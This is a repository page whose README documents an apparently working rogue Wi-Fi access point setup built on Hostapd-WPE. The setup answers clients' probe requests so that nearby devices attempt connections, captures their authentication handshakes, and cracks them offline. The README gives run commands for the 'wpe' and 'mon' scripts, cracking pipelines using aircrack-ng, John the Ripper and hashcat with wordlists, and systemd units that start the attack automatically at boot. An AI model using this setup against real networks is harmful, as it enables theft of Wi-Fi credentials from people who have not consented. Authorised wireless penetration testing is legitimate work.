tux/wpe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
30 Commits 1 Branch 0 Tags
Go to file
Clone
Open with VS Code Open with VSCodium Open with Intellij IDEA
Download ZIP Download TAR.GZ Download BUNDLE
Tux 91fba6ab94 Added systemd units
2025-09-20 12:43:02 +02:00
hostapd-wpe.conf
revert d6230487f83338473592972e68ddbf2d3b4b13b8
2025-09-11 15:39:53 +02:00
LICENSE
refactor
2025-09-09 06:22:35 +02:00
mon
add rfkill unlocking
2025-09-20 12:14:38 +02:00
README.md
Added systemd units
2025-09-20 12:43:02 +02:00
restore
make script executable
2025-09-12 10:38:20 +02:00
wpe
add rfkill unlocking
2025-09-20 12:14:38 +02:00
wpe-mon@.service
Added systemd units
2025-09-20 12:43:02 +02:00
wpe@.service
Added systemd units
2025-09-20 12:43:02 +02:00

README.md

Wireless Pwnage Edition

What does this do and how does it work?

This setup makes use of Hostapd-WPE (Wireless Pwnage Edition) which is a modified version of the standard hostapd (Host Access Point Daemon) tool. It allows to set up a rogue access point which mimics legitimate Wi-Fi networks, tricking clients into connecting with it and allows to capture their authentication credentials which are sent within the clients connection attempt.

Modern wireless clients (laptops, smartphones, tablets) attempt to maintain seamless connectivity by continuously probing for known Wi-Fi networks in their saved list. When a device is not connected to Wi-Fi, it will periodically send probe requests asking if any of its previously connected networks are available. This behavior allows them to automatically connect when a familiar network is in range, without user intervention. In combination with a tool like Hostapd-WPE this allows to cause clients in range to connect and even when the authentication fails from the clients view, it still allows to monitor the attempted handshake and obtain the contained authentication credentials.

This works as hostapd-WPE can be configured to respond to all probe requests with an "available" response, effectively making the client think the requested SSID is in range.

Many clients, depending on their security settings, will automatically attempt to connect to the AP, believing it to be the legitimate network.

The captured authentication attempts can then be used for offline password cracking.

Note: This method only works on clients which use a lower version than WPA3 as encryption protocol, like WPA2 or WPA.

Requirements

The following package needs to be installed for the wpe script to work

  • hostapd-wpe

For the mon script the "airodump-ng" executable is required, which is part of the package

  • aircrack-ng

Both scripts rely on the "ip" command which is part of the package

  • iproute2

As hardware prerequisite the host which is used to run the scripts needs two Wi-Fi network cards. One is used to run Hostapd-WPE and needs to support AP mode. The other is used to monitor the connection attempts and to record the authentication handshakes, requiring monitor mode. The supported modes for a Wi-Fi network card chipset can be checked with the command "iw list".

Usage

The script wpe is used to start the imitating AP on one interface. The interface needs to be set as option.

sudo ./wpe -i wlan0

The script mon can then be started simultaniously while the wpe script is still running. It captures connection attempts and writes them to a capture file. An interface needs to be given as option and it needs to be a different interface used for the wpe script.

sudo ./mon -i wlan1

Both scripts need the configuration file hostapd-wpe.conf either in the same directory or the default in /etc/hostapd-wpe/.

Processing a capture file

When monitoring Wi-Fi connections the resulting captured data is saved to a pcap file, numbered by the times the tool was run, so for the first run "wpa*-01.cap".

Various tools can be used to process the captured data, optionally making use of various wordlists which, depending on the host system, available in the directory /usr/share/wordlists.

Examples:

aircrack-ng with a simple wordlist:

aircrack-ng -w /usr/share/wordlists/wifite.txt wpa*-01.cap

Convert the capture for the use with the tool John the Ripper:

aircrack-ng wpa*-01.cap -J wpa &&
hccap2john wpa.hccap > wpa.john &&
john -w=/usr/share/wordlists/john.lst -form=wpapsk wpa.john

Convert the capture for the use with the tool Hashcat:

sudo apt -y install hcxtools &&
hcxpcapngtool -o wpa.hccapx wpa*-01.cap &&
hashcat -m 22000 -a 0 wpa.hccapx \
/usr/share/wordlists/rockyou.txt.gz

Running via systemd

The systemd unit files can be used to automatically start the corresponding scripts upon system boot.

This setup assumes the repository to be located in the /root directory.

Install the systemd unit files.

sudo cp -v wpe-mon@.service /etc/systemd/system/wpe-mon@.service
sudo cp -v wpe@.service /etc/systemd/system/wpe@.service

Apply the changes.

sudo systemctl daemon-reload

To set the mon script to use the wlan1 interface and start automatically.

sudo systemctl enable wpe-mon@wlan1.service

Alternatively with the wlan2 interface.

sudo systemctl enable wpe-mon@wlan2.service

Similarly for the wpe script.

sudo systemctl enable wpe@wlan1.service
Description
No description provided
Readme 0BSD 74 KiB
Languages
Shell 100%